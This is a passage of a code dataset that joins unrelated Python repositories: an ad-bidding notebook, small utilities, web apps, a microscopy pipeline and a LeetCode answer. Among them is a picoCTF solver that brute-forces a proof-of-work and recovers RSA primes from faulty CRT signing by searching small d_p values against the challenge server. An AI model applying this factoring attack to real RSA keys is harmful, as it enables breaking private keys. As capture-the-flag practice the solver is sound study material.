(1+MAX_PUSH)*campdf[\"attrs\"].loc[active_camps,\"cpc\"])\ncpc_df_campaign_new = cpc_df_campaign_new \\\n .combine_first(campdf[\"attrs\"].loc[active_camps,\"cpc\"])\n\nimport requests\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/allowed-publishers/\",\n headers=client.authorization_header)\ntaboola_publishers = jmespath.search('results[].account_id', resp.json())\n\nbid_mod_df = campdf[\"publisher_bid_modifier\"] \\\n .reindex(active_camps) \\\n .T.reindex(taboola_publishers).T\ncpc_df_publisher = bid_mod_df.fillna(1) * \\\n campdf[\"attrs\"].loc[active_camps, [\"cpc\"]].values\ncpc_df_publisher_new = np.clip(\n rps_df_publisher[\"rps_est\"] \\\n .reindex(active_camps) \\\n .T.reindex(taboola_publishers).T / ROI_TARGET,\n (1-MAX_CUT)*cpc_df_publisher,\n (1+MAX_PUSH)*cpc_df_publisher,)\nbid_mod_df_new = cpc_df_publisher_new / cpc_df_campaign_new.values.reshape(-1,1)\napprox1 = (bid_mod_df_new - 1).abs() < 1e-2\nbid_mod_df_new = bid_mod_df_new.loc[:,~(bid_mod_df_new.isna() | approx1).all(axis=0)]\nbid_mod_df_new = bid_mod_df_new \\\n .combine_first(bid_mod_df.loc[:,~bid_mod_df.isna().any()])\n#%%\ncampdf.loc[active_camps,(\"updates\",\"cpc\")] = cpc_df_campaign_new.round(2)\ncampdf.loc[active_camps,(\"updates\",\"publisher_bid_modifier\")] = \\\n bid_mod_df_new.round(2).apply(\n lambda r: {\n \"values\": [{'target': c, \"bid_modification\": v} for c,v in r[~r.isna()].items()]\n },\n axis=1)\ncampdf[\"updates\"] = campdf[\"updates\"].where(\n pd.notnull(campdf[\"updates\"]), None)\nupdatedf = pd.concat((\n campdf.loc[active_camps,\"attrs\"][\"advertiser_id\"],\n campdf.loc[active_camps,\"updates\"].apply(dict,axis=1).apply(json.dumps),\n),axis=1) \\\n .reset_index()\nupdatedf.columns = [\"campaign_id\",\"account_id\",\"update\"]\nupdatedf[\"date\"] = TODAY\nupdatedf[\"datetime\"] = NOW\n\nupload_taboola_updates_to_redshift(updatedf)\n#%%\nsql = f\"\"\"\n SELECT \n *\n FROM (\n SELECT \n *,\n ROW_NUMBER() OVER (\n PARTITION BY account_id,campaign_id,schedule\n ORDER BY datetime DESC\n ) as rn\n FROM \n {DS_SCHEMA}.{TABOOLA_CAMPAIGN_UPDATE_TABLE}\n )\n WHERE \n rn = 1\n ;\n\"\"\"\nwith HealthcareDW() as db:\n updatedf = db.to_df(sql)\nupdatedf['update'] = updatedf['update'].apply(json.loads)\n#%%\nfor _,r in updatedf.iterrows():\n client = TaboolaClient(**TABOOLA_HC_CREDS)\n camp_service = CampaignService(client, r[\"account_id\"])\n camp_service.update(r[\"campaign_id\"],**r[\"update\"])\n#%%\ncampdf.loc[active_camps]\n#%%\nsql = f\"\"\"\nselect d.query, substring(d.filename,14,20), \nd.line_number as line, \nsubstring(d.value,1,16) as value,\nsubstring(le.err_reason,1,48) as err_reason\nfrom stl_loaderror_detail d, stl_load_errors le\nwhere d.query = le.query\nand d.query = pg_last_copy_id(); \n\"\"\"\nsql = f\"\"\"\nselect *\nfrom stl_load_errors\norder by starttime desc\nlimit 100 \n\"\"\"\nwith HealthcareDW() as db:\n df = db.to_df(sql)\ndf\n#%%\ndf.iloc[0,-1]\n#%%\ndf.iloc[0, -3]\n#%%\n\nrps_df = rps_df.join(campdf[\"attrs\"][[\"cpc\",\"is_active\"]],on=\"campaign_id\",rsuffix=\"_\")\nrps_df = rps_df.loc[:,~rps_df.columns.duplicated()]\nrps_df[\"cost\"] = rps_df[\"cpc\"] * rps_df[\"sessions\"]\ndf = rps_df \\\n [rps_df[\"is_active\"].fillna(False)] \\\n .groupby([\"utc_dt\",\"campaign_id\"])\\\n [[\"revenue\",\"cost\"]].sum().unstack()\n(df[\"revenue\"]/df[\"cost\"]).plot()\n#%%\n#%%\ncampdf[\"publisher_bid_modifier\"]\ns1 = df[\"rps_est\"].unstack().columns\ns2 = campdf[\"publisher_bid_modifier\"].columns\ns1 = {*s1}; s2 = {*s2}\nlen(s1-s2),len(s2-s1),len(s1&s2)\n#%%\n{f[3:] for f in clusterer.enc_features} - s2\n#%%\nimport requests\nTABOOLA_BASE = \"https://backstage.taboola.com/backstage/api/1.0\"\nresp = requests.get(\n f\"{TABOOLA_BASE}/resources/campaigns_properties/operating_systems\",\n headers=client.authorization_header)\ntaboola_os = jmespath.search('results[].name', resp.json(),)\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/resources/campaigns_properties/platforms\",\n headers=client.authorization_header)\ntaboola_platforms = jmespath.search('results[].name', resp.json(),)\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/resources/countries/us/dma\",\n headers=client.authorization_header)\ntaboola_dmas = jmespath.search('results[].name', resp.json(),)\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/resources/countries/us/regions\",\n headers=client.authorization_header)\ntaboola_states = jmespath.search('results[].name', resp.json(),)\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/allowed-publishers/\",\n headers=client.authorization_header)\ntaboola_publishers = jmespath.search('results[].account_id',resp.json())\n#%%\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/dictionary/audience_segments/\",\n headers=client.authorization_header)\ntaboola_audiences = resp.json()[\"results\"]\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/dictionary/lookalike_audiences/\",\n headers=client.authorization_header)\nresp.json()\n\nresp = requests.get(\n f\"{TABOOLA_BASE}/{O65_ACCNT_ID}/dictionary/contextual_segments/\",\n headers=client.authorization_header)\nlen(resp.json()[\"results\"])\n# %%\ns3 = {*taboola_publishers}\nlen(s1-s3),len(s2-s3)\n# %%\n{f[3:] for f in clusterer.enc_features} - s3\n# %%\n","repo_name":"pkrishnamurthy1007/adtech","sub_path":"models/taboola/nb.py","file_name":"nb.py","file_ext":"py","file_size_in_byte":16131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28977829197","text":"\n\ndef precio_hora(lista_obj,facturacion,tipo):\n objs=len(lista_obj[1])\n p_hora=0\n for i in range(objs):\n if facturacion >= lista_obj[1][i] and facturacion < lista_obj[1][i+1]:\n p_hora=lista_obj[tipo][i]\n break\n return p_hora\n\ndef tipo_hora(lista_obj):\n print(\"Ingrese el tipo de hora: \")\n for i in range(2,5):\n print(\"Opción \", i-1,\" - \", lista_obj[0][i])\n opc=int(input(\"Ingrese la opción correcta: \"))\n while opc<1 or opc>3:\n opc=int(input(\"Ingrese una opción correcta: \"))\n return opc+1\n\ndef facturacion(lista_obj):\n objs=lista_obj[1][len(lista_obj[1])-1]-1\n facturacion=float(input(\"Ingrese el total de Facturación: \"))\n while facturacion < 0 or facturacion > objs:\n print(\"Ingrese un número mayor que 0 y menor que \",objs)\n facturacion=float(input(\"Ingrese el total de Facturación: \"))\n return facturacion\n\ndef tabla(lista_obj):\n objs0=len(lista_obj)\n objs1=len(lista_obj[1])\n objs2=len(lista_obj[0])\n esp1=\" \"\n for k in range(objs2):\n aux=12\n esp2=aux-len(str(lista_obj[0][k]))\n esp3=esp1*esp2\n print(lista_obj[0][k],end=esp3)\n print()\n for j in range(objs1):\n aux=4\n esp1=\" \"\n esp2=aux-len(str(j))\n esp3=esp1*esp2\n print(esp3,j,end=\"\")\n for i in range(1,objs0):\n aux=6\n esp2=aux-len(str(lista_obj[i][j]))\n esp3=esp1*esp2\n print(\" $\",esp3,lista_obj[i][j],end=\"\")\n print() \n\n\n\"\"\"\nImpresión de tabla considerando la distancia a la derecha\ndef tabla(lista_obj):\n objs0=len(lista_obj)\n objs1=len(lista_obj[0])\n for j in range(objs1):\n aux=6\n esp1=\" \"\n esp2=aux-len(str(j))\n esp3=esp1*esp2\n print(j,end=esp3)\n for i in range(objs0):\n aux=8\n esp2=aux-len(str(lista_obj[i][j]))\n esp3=esp1*esp2\n print(lista_obj[i][j],end=esp3)\n print()\n\n\"\"\"\ndef lista_objetivos():\n obj_sanjuan=[[\"Índice\", \"Ventas\", \"Día Semana\", \"Sábado\", \"Domingo\"],[0\t,\t4000\t,\t6000\t,\t8000\t,\t10000\t,\t11500\t,\t13000\t,\t14500\t,\t16000\t,\t17500\t,\t19000\t,\t20500\t,\t22000\t,\t23500\t,\t25000\t,\t26500\t,\t28000\t,\t29500\t,\t31000],[40\t,\t45\t,\t50\t,\t55\t,\t60\t,\t65\t,\t70\t,\t75\t,\t80\t,\t85\t,\t90\t,\t95\t,\t100\t,\t105\t,\t110\t,\t115\t,\t120\t,\t125\t,\t130],[45\t,\t51\t,\t56\t,\t62\t,\t68\t,\t73\t,\t79\t,\t84\t,\t90\t,\t96\t,\t102\t,\t108\t,\t113\t,\t119\t,\t124\t,\t130\t,\t135\t,\t141\t,\t146],[50\t,\t56\t,\t63\t,\t69\t,\t75\t,\t81\t,\t88\t,\t94\t,\t100\t,\t106\t,\t113\t,\t119\t,\t125\t,\t131\t,\t137\t,\t143\t,\t149\t,\t155\t,\t162]]\n return obj_sanjuan\n\ndef despedida():\n mensaje=\"Gracias por usar el programa...\"\n print(mensaje)\n\notra=\"s\"\nobj_sanjuan=lista_objetivos()\nwhile otra==\"s\" or otra==\"S\":\n tabla(obj_sanjuan)\n print()\n facturac=facturacion(obj_sanjuan)\n print()\n tipo=tipo_hora(obj_sanjuan)\n print()\n cant_horas=float(input(\"Ingrese la cantidad de horas trabajadas: \"))\n while cant_horas<0 or cant_horas>24:\n cant_horas=float(input(\"Ingrese la cantidad de horas correcta: \")) \n hora=precio_hora(obj_sanjuan,facturac,tipo)\n print()\n print(\"El precio de la hora es: $\",hora)\n print(\"Corresponde cobrar: $\",hora*cant_horas)\n\n otra=str(input(\"Ingrese ´s´ si quiere hacer otra consulta: \"))\n\ndespedida()","repo_name":"alopezluz/proyecto01","sub_path":"Cálculo Objetivos San Juan.py","file_name":"Cálculo Objetivos San Juan.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28446562265","text":"from fastapi import FastAPI, status\nfrom fastapi.exceptions import RequestValidationError\nfrom fastapi.exceptions import HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom app.api.errors.http_error import http_error_handler\nfrom app.api.errors.validation_error import http422_error_handler\nfrom app.api.routes.api import router as api_router\nfrom app.core.config import ALLOWED_HOSTS, API_PREFIX, DEBUG, PROJECT_NAME, VERSION\nfrom app.core.events import create_start_app_handler, create_stop_app_handler\n\n\ndef get_fastapi_app(title: str = \"\", debug: bool = False, version: str = \"0.0.0\"):\n initial_app = FastAPI(title=title, debug=debug, version=version)\n initial_app.add_middleware(\n CORSMiddleware,\n allow_origins=ALLOWED_HOSTS or [\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\n # App Startup/Shutdown Events\n initial_app.add_event_handler(\"startup\", create_start_app_handler(initial_app))\n initial_app.add_event_handler(\"shutdown\", create_stop_app_handler(initial_app))\n\n # Exception Handlers\n initial_app.add_exception_handler(HTTPException, http_error_handler)\n initial_app.add_exception_handler(RequestValidationError, http422_error_handler)\n\n # Add Routes\n initial_app.include_router(api_router, prefix=API_PREFIX)\n\n return initial_app\n\n\napp = get_fastapi_app(title=PROJECT_NAME, debug=DEBUG, version=VERSION)\n\n\n@app.get(\"/\", response_model=dict, status_code=status.HTTP_200_OK)\nasync def root():\n \"\"\"\n Root landing message at index.\n \"\"\"\n return {\"message\": \"This is root! See /docs to view available endpoints.\"}\n\n\n@app.get(\"/health\", response_model=dict, status_code=status.HTTP_200_OK)\nasync def health_check():\n \"\"\"\n Health check endpoint.\n \"\"\"\n return {\"message\": \"API is up and healthy.\"}\n","repo_name":"adrianme213/fastapi-api-example","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18758968429","text":"from django.urls import path,re_path\n# 引入views.py\nfrom . import views\n\napp_name = 'notice'\n\nurlpatterns = [\n # 通知列表\n\nre_path(r'^personal/update/$', views.CommentNoticeUpdateView.as_view(), name='readed'),\nre_path(r'^personal/message/$',views.Allmessages,name='message'),\n]\n\n\n\n","repo_name":"jinheshimingrichou/qidian_noval","sub_path":"notice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10980039951","text":"import tkinter as tk\nimport scipy.io as sio\nimport numpy as np\n\n\nclass Interface():\n def __init__(self):\n # Interface part\n self.window = tk.Tk()\n tk.Label(self.window, text = \"Level file name:\").grid(row = 0)\n self.level_file_name = tk.StringVar()\n tk.Entry(self.window, textvariable = self.level_file_name, width = 45).grid(row = 0, column = 1)\n tk.Button(self.window, text = \"Import\", command = self.import_file).grid(row = 0, column = 2)\n\n self.text = tk.Text(self.window, width = 20, height = 20)\n self.text.grid(row = 1)\n\n self.text2 = tk.Text(self.window, width = 20, height = 20)\n self.text2.grid(row = 1, column = 1)\n\n self.window.mainloop()\n\n def import_file(self):\n file_name = self.level_file_name.get()\n\n try:\n data = sio.loadmat(file_name)\n except:\n return\n\n data[\"scores\"] = np.reshape(data[\"scores\"], (-1,))\n data[\"results\"] = np.reshape(data[\"results\"], (-1,))\n\n total_run_time = data[\"scores\"].size\n\n moves_idxs = np.argsort(data[\"results\"])\n\n self.text.delete(1.0, tk.END)\n\n self.text2.delete(1.0, tk.END)\n\n self.text.insert(tk.END, \" ---Moves---\\n\")\n\n self.text2.insert(tk.END, \"---Scores---\\n\")\n\n for i in range(-1, -16, -1):\n if moves_idxs[i] == 0 or data[\"results\"][moves_idxs[i]] == 0:\n break\n self.text.insert(tk.END, \"{0:3d}: {1:5d} times\\n\".format(moves_idxs[i], data[\"results\"][moves_idxs[i]]))\n\n self.text2.insert(tk.END, \"{}\\n\".format(data[\"scores\"][moves_idxs[i]] / data[\"results\"][moves_idxs[i]]))\n\n\n\n\ndef main():\n interface = Interface()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"UCLA-StarAI/Analogous-Disentangled-Actor-Critic","sub_path":"utils/logs/AIViewer.py","file_name":"AIViewer.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"24836870177","text":"'''\n# This is a class for processing excel files, including readring and writing excel data, as well as processing specific operations and saving as a new excel file.\n\nimport openpyxl\n\n\nclass ExcelProcessor:\n def __init__(self):\n pass\n\n def read_excel(self, file_name):\n \"\"\"\n Reading data from Excel files\n :param file_name:str, Excel file name to read\n :return:list of data, Data in Excel\n \"\"\"\n\n\n def write_excel(self, data, file_name):\n \"\"\"\n Write data to the specified Excel file\n :param data: list, Data to be written\n :param file_name: str, Excel file name to write to\n :return: 0 or 1, 1 represents successful writing, 0 represents failed writing\n >>> processor = ExcelProcessor()\n >>> new_data = [\n >>> ('Name', 'Age', 'Country'),\n >>> ('John', 25, 'USA'),\n >>> ('Alice', 30, 'Canada'),\n >>> ('Bob', 35, 'Australia'),\n >>> ('Julia', 28, 'Germany')\n >>> ]\n >>> data = processor.write_excel(new_data, 'test_data.xlsx')\n \"\"\"\n\n\n def process_excel_data(self, N, save_file_name):\n \"\"\"\n Change the specified column in the Excel file to uppercase\n :param N: int, The serial number of the column that want to change\n :param save_file_name: str, source file name\n :return:(int, str), The former is the return value of write_excel, while the latter is the saved file name of the processed data\n >>> processor = ExcelProcessor()\n >>> success, output_file = processor.process_excel_data(1, 'test_data.xlsx')\n \"\"\"\n\n\n'''\n\nimport openpyxl\n\n\nclass ExcelProcessor:\n def __init__(self):\n pass\n\n def read_excel(self, file_name):\n data = []\n try:\n workbook = openpyxl.load_workbook(file_name)\n sheet = workbook.active\n for row in sheet.iter_rows(values_only=True):\n data.append(row)\n workbook.close()\n return data\n except:\n return None\n\n def write_excel(self, data, file_name):\n try:\n workbook = openpyxl.Workbook()\n sheet = workbook.active\n for row in data:\n sheet.append(row)\n workbook.save(file_name)\n workbook.close()\n return 1\n except:\n return 0\n\n def process_excel_data(self, N, save_file_name):\n data = self.read_excel(save_file_name)\n if data is None or N >= len(data[0]):\n return 0\n new_data = []\n for row in data:\n new_row = list(row[:])\n if not str(row[N]).isdigit():\n new_row.append(str(row[N]).upper())\n else:\n new_row.append(row[N])\n new_data.append(new_row)\n new_file_name = save_file_name.split('.')[0] + '_process.xlsx'\n success = self.write_excel(new_data, new_file_name)\n return success, new_file_name\n\n\n","repo_name":"FudanSELab/ClassEval","sub_path":"data/benchmark_solution_code/ExcelProcessor.py","file_name":"ExcelProcessor.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"3"} +{"seq_id":"18393825305","text":"from Crypto.Util.number import *\n#import sympy\nfrom functools import reduce\nfrom operator import mul\nfrom itertools import combinations\nimport sys\nimport socket, struct, telnetlib\nimport hashlib\nimport string\nimport math\n\n# --- common funcs ---\ndef sock(remoteip, remoteport):\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((remoteip, remoteport))\n\treturn s, s.makefile('rw')\n\ndef read_until(f, delim='\\n'):\n\tdata = ''\n\twhile not data.endswith(delim):\n\t\tdata += f.read(1)\n\treturn data\n\ndef returnarray(i):\n\td = []\n\twhile i > 0:\n\t\td.append(i%64)\n\t\ti = i//64\n\treturn d\n\ndef PoW(first, second):\n\ts = string.printable\n\tprint(len(s))\n\ti = 0\n\tfor k in range(1,1000):\n\t\t#k文字の入力\n\t\tfor j in range(pow(100,len(s))):\n\t\t\ti += 1\n\t\t\ttext = first\n\t\t\tces = returnarray(i)\n\t\t\tfor l in range(len(ces)):\n\t\t\t\ttext += s[ces[l]]\n\t\t\t#print(text)\n\t\t\ths = hashlib.md5(text.encode()).hexdigest()\n\t\t\t#print(hs[:5],hs[-6:])\n\t\t\tif hs[-6:] == second:\n\t\t\t\tprint(hs)\n\t\t\t\tprint(text)\n\t\t\t\treturn text\n\t\t\n\t#return \"test\"\n\t\t\n\t\n#HOSTはIPアドレスでも可\nHOST, PORT = \"mercury.picoctf.net\", 47414\ns, f = sock(HOST, PORT)\nrecv_m = read_until(f).split()\n#for i in range(len(recv_m)):\n#\tprint(i,recv_m[i])\nfirst = recv_m[6][1:-1]\nsecond = recv_m[-1]\nprint(first,second)\ntext = PoW(first,second)\ns.send(text.encode()+b'\\n')\nrecv_m = read_until(f).split()\nn = int(recv_m[-1])\nprint(recv_m)\n#print(sympy.factorint(n))\nrecv_m = read_until(f).split()\ne = int(recv_m[-1])\nprint(recv_m)\nm = 12345\nmaxD = 1 << 20\nprint(maxD)\nc = pow(m,e,n)\nfor d_p in range(1,maxD+1):\n\tif d_p%10000 == 0: print(d_p)\n\tmm = pow(c,d_p,n)\n\tdif = mm-m\n\tif(dif < 0): dif = -dif\n\tp = math.gcd(dif,n)\n\tif p != 1:\n\t\t#pが判明\n\t\tq = n//p\n\t\tans = p+q\n\t\tans = str(ans)\n\t\ts.send(ans.encode()+b\"\\n\")\n\t\tbreak\nprint(\"for d_p finish\")\n#print(e)\n#ne = str(e).encode() + b\"\\n\"\n#s.send(ne)\nwhile True:\n\tprint(read_until(f))\n#read_untilの使い方\n#返り値があるのでprintするか、何かの変数に入れる\n#1行読む:read_until(f)\n#特定の文字まで読む:read_until(f,\"input\")\n#配列に格納する:recv_m = read_until(f).split() ot .strip()\n\n#サーバーに何か送るとき\n#s.send(b'1\\n') : 1を送っている\n#バイト列で送ること。str->bytesにするには、変数の後に.encode()\n#必ず改行を入れること。終了ポイントが分からなくなる。ex) s.send(flag.encode() + b'\\n')\n\n","repo_name":"ksbowler/picoCTF_2021","sub_path":"Cryptography/Its_Not_My_Fault_1/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24812627820","text":"class Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n # Doesn't take negatives into consideration\n# # Sliding window\n# # Expand if <= k\n# # Retract if > k\n# left = right = 0\n# tot = nums[0]\n# ans = 0\n \n# while right < len(nums):\n# if tot == k:\n# ans += 1\n# # Expand while less or equal\n# if tot <= k or left == right:\n# right += 1\n# if right == len(nums):\n# break\n# tot += nums[right]\n \n# elif tot > k and left < right:\n# tot -= nums[left]\n# left += 1\n \n# return ans\n\n# # Simple brute force but takes too long in Python\n# ans = 0\n# for i in range(len(nums)):\n# tot = 0\n# for j in range(i, len(nums)):\n# tot += nums[j]\n# if tot == k:\n# ans += 1\n \n# return ans\n \n # Use a dictionary of running sums and a count of how many times it's come up\n # Then, as we iterate through, our current sum - k will be equal to whatever we need that might be in the dict\n # ex: imagine array [1, 2, 3, 4, -1] and k = 3\n # Our running sum array would be [0, 1, 3, 6, 10, 9]\n # So we can see that from 0 -> 3 is an increase of k. From 3 -> 6, and again from 6 -> 9\n # thus the answer should be 3\n \n count = 0\n sums = {\n 0: 1,\n }\n tot = 0\n for num in nums:\n tot += num\n count += sums.get(tot - k, 0)\n sums[tot] = sums.get(tot, 0) + 1\n \n return count \n ","repo_name":"PigsGoMoo/LeetCode","sub_path":"subarray-sum-equals-k/subarray-sum-equals-k.py","file_name":"subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31187578119","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport ml_tools as tools\nimport matplotlib.pyplot as plt\nimport argparse\n\nHOUSE = 'Hogwarts House'\n\n\ndef histogram(df, col, length, i, j):\n plt.subplot(length, length, (i - 1) * length + j)\n plt.hist(df[df[HOUSE] == 'Slytherin'][col],\n alpha=0.4, label=\"Slytherin\", color=\"green\")\n plt.hist(df[df[HOUSE] == 'Gryffindor'][col],\n alpha=0.4, label=\"Gryffindor\", color=\"red\")\n plt.hist(df[df[HOUSE] == 'Ravenclaw'][col],\n alpha=0.4, label=\"Ravenclaw\", color=\"cyan\")\n plt.hist(df[df[HOUSE] == 'Hufflepuff'][col],\n alpha=0.4, label=\"Hufflepuff\", color=\"gold\")\n ax = plt.gca()\n ax.axes.xaxis.set_ticks([])\n ax.axes.yaxis.set_ticks([])\n if (j == 1):\n ax.set_ylabel(col.replace(' ', '\\n'), fontsize=6)\n if (i == length):\n ax.set_xlabel(col.replace(' ', '\\n'), fontsize=8)\n\n\ndef scatter_plot(df, row, col, length, i, j):\n plt.subplot(length, length, (i - 1) * length + j)\n plt.scatter(df[df[HOUSE] == 'Slytherin'][row], df[df[HOUSE]\n == 'Slytherin'][col], alpha=0.4, s=0.1, label=\"Slytherin\", color=\"green\")\n plt.scatter(df[df[HOUSE] == 'Gryffindor'][row], df[df[HOUSE]\n == 'Gryffindor'][col], alpha=0.4, s=0.4, label=\"Gryffindor\", color=\"red\")\n plt.scatter(df[df[HOUSE] == 'Ravenclaw'][row], df[df[HOUSE]\n == 'Ravenclaw'][col], alpha=0.4, s=0.4, label=\"Ravenclaw\", color=\"cyan\")\n plt.scatter(df[df[HOUSE] == 'Hufflepuff'][row], df[df[HOUSE]\n == 'Hufflepuff'][col], alpha=0.4, s=0.4, label=\"Hufflepuff\", color=\"gold\")\n ax = plt.gca()\n ax.axes.xaxis.set_ticks([])\n ax.axes.yaxis.set_ticks([])\n if (j == 1):\n ax.set_ylabel(row.replace(' ', '\\n'), fontsize=6)\n if (i == length):\n ax.set_xlabel(col.replace(' ', '\\n'), fontsize=8)\n\n\ndef pair_plot(df):\n dropped = df.dropna(how='all', axis=1).select_dtypes(\n [np.int64, np.float64])\n length = len(dropped.columns)\n plt.rcParams[\"figure.figsize\"] = [50, 42]\n plt.title(\"Pair plot\")\n for row, i in zip(dropped.columns, range(1, length + 1)):\n for col, j in zip(dropped.columns, range(1, length + 1)):\n # print(i, j, row, col)\n tools.remove_empty_fields(df[col])\n tools.remove_empty_fields(df[row])\n if row == col:\n histogram(df, row, length, i, j)\n else:\n scatter_plot(df, row, col, length, i, j)\n # if i == 1:\n # break\n # if i == 1:\n # break\n plt.legend(bbox_to_anchor=(1.04, 1))\n plt.show()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Plot the pair_plot of a dataset\")\n parser.add_argument(\"csv_file\", type=str, help=\"csv file to plot\")\n args = parser.parse_args()\n try:\n tools.is_valid_path(args.csv_file)\n except Exception as e:\n sys.exit(e)\n df = pd.read_csv(args.csv_file).drop(columns=['Index'])\n pair_plot(df)\n","repo_name":"Lap0u/dslr","sub_path":"pair_plot.py","file_name":"pair_plot.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25155285477","text":"\"\"\"\nThis class is used to run the entire preprocessing pipeline - \nfrom CZI files to a pyramid of tiles that can be viewed in neuroglancer.\n\nArgs are animal, channel, and downsample. With animal being\nthe only required argument.\nAll imports are listed by the order in which they are used in the \n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport threading\nfrom timeit import default_timer as timer\n\nfrom lib.FileLocationManager import FileLocationManager\nfrom lib.MetaUtilities import MetaUtilities\nfrom lib.PrepCreater import PrepCreater\nfrom lib.NgPrecomputedMaker import NgPrecomputedMaker\nfrom lib.NgDownsampler import NgDownsampler\nfrom lib.ProgressLookup import ProgressLookup\nfrom lib.TiffExtractor import TiffExtractor\nfrom lib.FileLogger import FileLogger\nfrom lib.ParallelManager import ParallelManager\nfrom lib.Normalizer import Normalizer\nfrom lib.MaskManager import MaskManager\nfrom lib.ImageCleaner import ImageCleaner\nfrom lib.HistogramMaker import HistogramMaker\nfrom lib.ElastixManager import ElastixManager\nfrom controller.sql_controller import SqlController\nfrom utilities.utilities_process import get_hostname\n\n\nclass Pipeline(\n MetaUtilities,\n TiffExtractor,\n PrepCreater,\n ParallelManager,\n Normalizer,\n MaskManager,\n ImageCleaner,\n HistogramMaker,\n ElastixManager,\n NgPrecomputedMaker,\n NgDownsampler,\n FileLogger\n):\n \"\"\"\n This is the main class that handles the preprocessing pipeline responsible for converting Zeiss microscopy images (.czi) into neuroglancer\n viewable formats. The Zeiss module can be swapped out to make the pipeline compatible with other microscopy setups\n \"\"\"\n TASK_CREATING_META = \"Yanking meta data from CZI files\"\n TASK_CREATING_WEB_IMAGES = \"Creating web friendly PNG images\"\n TASK_EXTRACTING_TIFFS = \"Extracting TIFFs\"\n TASK_APPLYING_QC = \"Applying QC\"\n TASK_APPLYING_NORMALIZATION = \"Creating normalization\"\n TASK_CREATING_MASKS = \"Creating masks\"\n TASK_APPLYING_MASKS = \"Applying masks\"\n TASK_CREATING_CLEANED_IMAGES = \"Creating cleaned image\"\n TASK_CREATING_HISTOGRAMS = \"Making histogram\"\n TASK_CREATING_COMBINED_HISTOGRAM = \"Making combined histogram\"\n TASK_CREATING_ELASTIX_TRANSFORM = \"Creating elastix transform\"\n TASK_CREATING_ELASTIX_METRICS = \"Creating elastix metrics\"\n TASK_NEUROGLANCER_SINGLE = \"Neuroglancer1 single\"\n TASK_NEUROGLANCER_PYRAMID = \"Neuroglancer2 pyramid\"\n\n def __init__(self, animal, channel, downsample, data_path, tg, debug):\n \"\"\"Setting up the pipeline and the processing configurations\n Here is how the Class is instantiated:\n pipeline = Pipeline(animal, channel, downsample, data_path, tg, debug)\n\n The pipeline performst the following steps:\n 1. extracting the images from the microscopy formats (eg czi) to tiff format\n 2. Prepare thumbnails of images for quality control\n 3. clean the images\n 4. align the images\n 5. convert to Seung lab neuroglancer cloudvolume format\n\n step 3 and 4 are first performed on downsampled images, and the image masks(for step 3) and the within stack alignments(for step 4) are\n upsampled for use in the full resolution images\n\n Args:\n animal (str): Animal Id\n channel (int, optional): channel number. This tells the program which channel to work on and which channel to extract from the czis. Defaults to 1.\n downsample (bool, optional): Determine if we are working on the full resolution or downsampled version. Defaults to True.\n data_path (str, optional): path to where the images and intermediate steps are stored. Defaults to '/net/birdstore/Active_Atlas_Data/data_root'.\n debug (bool, optional): determine if we are in debug mode. This is used for development purposes. Defaults to False. (forces processing on single core)\n \"\"\"\n self.animal = animal\n self.channel = channel\n self.ch_dir = f\"CH{self.channel}\"\n self.downsample = downsample\n self.debug = debug\n self.fileLocationManager = FileLocationManager(animal, data_path=data_path)\n self.sqlController = SqlController(animal)\n self.hostname = get_hostname()\n self.tg = tg\n self.progress_lookup = ProgressLookup()\n self.check_programs()\n self.section_count = self.sqlController.get_section_count(self.animal)\n super().__init__(self.fileLocationManager.get_logdir())\n\n\n @staticmethod\n def check_programs():\n \"\"\"\n Make sure the necessary tools are installed on the machine and configures the memory of involving tools to work with\n big images.\n Some tools we use are based on java so we adjust the java heap size limit to 10 GB. This is big enough for our purpose but should\n be increased accordingly if your images are bigger\n If the check failed, check the workernoshell.err.log in your project directory for more information\n \"\"\"\n start_time = timer()\n \n error = \"\"\n if not os.path.exists(\"/usr/bin/identify\"):\n error += \"\\nImagemagick is not installed\"\n\n if len(error) > 0:\n print(error)\n sys.exit()\n end_time = timer()\n total_elapsed_time = end_time - start_time\n print(f\"Check programs took {round(total_elapsed_time,1)} seconds\")\n\n def run_program_and_time(self, function, function_name):\n \"\"\"utility to run a specific function and time it\n\n Args:\n function (function): funtion to run\n function_name (str): name of the function used to report timing result\n \"\"\"\n print(function_name, end=\"\")\n start_time = timer()\n self.logevent(f\"START 